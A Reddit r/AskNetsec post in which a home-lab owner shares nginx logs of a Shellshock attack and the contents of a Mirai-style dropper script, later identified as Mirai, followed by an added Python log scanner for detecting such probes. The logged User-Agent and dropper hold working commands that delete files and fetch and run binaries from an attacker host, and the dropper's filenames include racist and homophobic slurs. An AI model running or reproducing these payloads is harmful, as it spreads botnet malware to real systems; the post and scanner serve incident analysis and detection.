nginx-1 | 50.116.48.10 - - [11/Feb/2024:18:41:09 +0000] "GET / HTTP/1.1" 200 310 "-" "Go-http-client/1.1"
frontend-1 | 172.22.0.5 - - [11/Feb/2024:18:52:58 +0000] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 200 454 "-" "() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.*.*.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'" "-"
nginx-1 | 185.224.128.10 - - [11/Feb/2024:18:52:58 +0000] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 200 454 "-" "() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.*.*.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'"
Meanwhile, the contents of this n*****.sh file...
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lol http://192.*.*.183/mips; chmod +x lol; ./lol sonic
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lmao http://192.*.*.183/mpsl; chmod +x lmao; ./lmao sonic
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O faggot http://192.*.*.183/x86_64; chmod +x faggot; ./faggot sonic
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O gay http://192.*.*.183/nigga.sh/arm; chmod +x gay; ./gay sonic
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O retard http://192.*.*.183/arm5; chmod +x retard; ./retard sonic
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O nigger http://192.*.*.183/arm6; chmod +x nigger; ./nigger sonic
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O shit http://192.*.*.183/arm7; chmod +x shit; ./shit sonic
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O nigga http://192.*.*.183/i586; chmod +x nigga; ./nigga sonic
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kekw http://192.*.*.183/i686; chmod +x kekw; ./kekw sonic
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O what http://192.*.*.183/powerpc; chmod +x what; ./what sonic
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kys http://192.*.*.183/sh4; chmod +x kys; ./kys sonic
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O shiteater http://192.*.*.183/m68k; chmod +x shiteater; ./shiteater sonic
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O blyat http://192.*.*.183/sparc; chmod +x blyat; ./blyat sonic
Does anyone know what these executable files do? Given the foul language in their script I assume this is a kid. Also, is it normal for this stuff to occur within literally 30 minutes of opening the DMZ of my home firewall? I've hosted things in the cloud (Linode) for years without anything like this showing up in my logs. These docker containers are on their own walled off VLAN, so I don't think there's too much damage the attacker could cause. I hope. If there's a more appropriate sub for this post please let me know.
EDIT: This was not some kid. I couldn't have been more wrong, as it appears to be the Mirai botnet.
EDIT2: Defanged the URLs per the comments. Apologies for leaving it up like that for so long, I really hope nobody clicked them. I'm an idiot and was reading all the comments as "defanjed" and was super confused. But 19 hours later I was able to rub two brain cells together and realize what everyone was asking.
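An added example, written for this page and not taken from the post or its comments: the `() { :; };` prefix in the User-Agent above is the Shellshock (CVE-2014-6271) signature, a bash function definition followed by trailing commands that a CGI handler exports into the environment, and the script it fetches is a Mirai-style multi-architecture dropper that tries one binary per CPU type. The Python below scans nginx "combined" log lines (with the docker compose `service |` prefix seen in the post) for that pattern and for bare /cgi-bin/ probing, pulls the download URLs out as indicators, and parses a dropper in the same shape to list the architectures targeted and the writable-directory fallback chain. All log lines, IPs, URLs and filenames in it are constructed placeholders; the service name, the `Finding` and `DropTarget` types and the function names are this example's own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample log lines (nginx "combined" format, prefixed with the
# docker compose service name as in the post). IPs are documentation ranges
# and the payload URL is a placeholder, not the poster's real data.
SAMPLE_LOG = """\
nginx-1 | 203.0.113.10 - - [11/Feb/2024:18:41:09 +0000] "GET / HTTP/1.1" 200 310 "-" "Go-http-client/1.1"
nginx-1 | 198.51.100.7 - - [11/Feb/2024:18:52:58 +0000] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 200 454 "-" "() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.0.2.183/dropper.sh; chmod 777 dropper.sh; ./dropper.sh'"
nginx-1 | 198.51.100.9 - - [11/Feb/2024:19:01:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 153 "-" "curl/8.0.1"
nginx-1 | 198.51.100.9 - - [11/Feb/2024:19:01:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Constructed dropper in the shape of the one quoted in the post: one line per
# architecture, each with the same writable-directory fallback chain.
SAMPLE_DROPPER = """\
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O a http://192.0.2.183/mips; chmod +x a; ./a sonic
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O b http://192.0.2.183/mpsl; chmod +x b; ./b sonic
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O c http://192.0.2.183/x86_64; chmod +x c; ./c sonic
"""

# nginx combined log, optionally prefixed by "<service> | " from docker compose.
LOG_RE = re.compile(
    r'^(?:(?P<service>\S+) \| )?'
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# Shellshock (CVE-2014-6271): a bash function definition "() { :; };" followed
# by trailing commands, delivered in any header a CGI handler exports to bash.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:;\s*\}\s*;')
URL_RE = re.compile(r'https?://[^\s\'";]+')
WGET_RE = re.compile(r'wget\s+(?:-q\s+)?-O\s+(\S+)\s+(https?://[^\s;]+)')


@dataclass
class Finding:
    kind: str            # "shellshock" or "cgi-probe"
    ip: str
    ts: str
    path: str
    status: str
    urls: List[str] = field(default_factory=list)   # payload URLs seen in headers


def parse_log_line(line: str) -> Optional[dict]:
    """Split one combined-format line into named fields, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_shellshock(s: str) -> bool:
    return SHELLSHOCK_RE.search(s) is not None


def extract_urls(s: str) -> List[str]:
    return URL_RE.findall(s)


def scan_log(text: str) -> List[Finding]:
    """Flag Shellshock payloads in UA/Referer, and plain /cgi-bin/ probing as lower-severity noise."""
    findings = []
    for line in text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        headers = rec["ua"] + " " + rec["referer"]   # only the headers nginx logs
        if is_shellshock(headers):
            kind = "shellshock"
        elif rec["path"].startswith("/cgi-bin/"):
            kind = "cgi-probe"
        else:
            continue
        findings.append(Finding(kind, rec["ip"], rec["ts"], rec["path"],
                                rec["status"], extract_urls(headers)))
    return findings


@dataclass
class DropTarget:
    local_name: str   # name the bot writes the binary to
    url: str
    arch: str         # last path component of the URL, e.g. "mips", "x86_64"


def parse_dropper(text: str) -> List[DropTarget]:
    """List every (name, URL, arch) the dropper tries; one entry per 'wget -O' stage."""
    return [DropTarget(name, url, url.rsplit("/", 1)[-1])
            for name, url in WGET_RE.findall(text)]


def dropper_fallback_dirs(text: str) -> List[str]:
    """Directories in the first 'cd X || cd Y || ...' chain, i.e. where the bot expects to write."""
    m = re.search(r'((?:cd\s+\S+\s*\|\|\s*)+cd\s+\S+);', text)
    return re.findall(r'cd\s+(\S+)', m.group(1)) if m else []


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
    for t in parse_dropper(SAMPLE_DROPPER):
        print(t)
    print(dropper_fallback_dirs(SAMPLE_DROPPER))
```

Run against a real access log, the URLs in `Finding.urls` are the indicators to block and hunt for, and the `arch` list from the dropper tells you which of your hosts could actually have executed a stage. Two caveats: nginx only logs User-Agent and Referer, so a Shellshock payload carried in another header (Cookie, Host, custom headers) is invisible here unless you add `$http_*` variables to `log_format`; and a 200 on a /cgi-bin/ path, as in the post, means something answered the request, so check what actually served it rather than assuming the probe failed.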
Subreddit: r/AskNetsec
Posted: 9 months ago
Reddit URL: reddit.com/r/AskNetsec/c...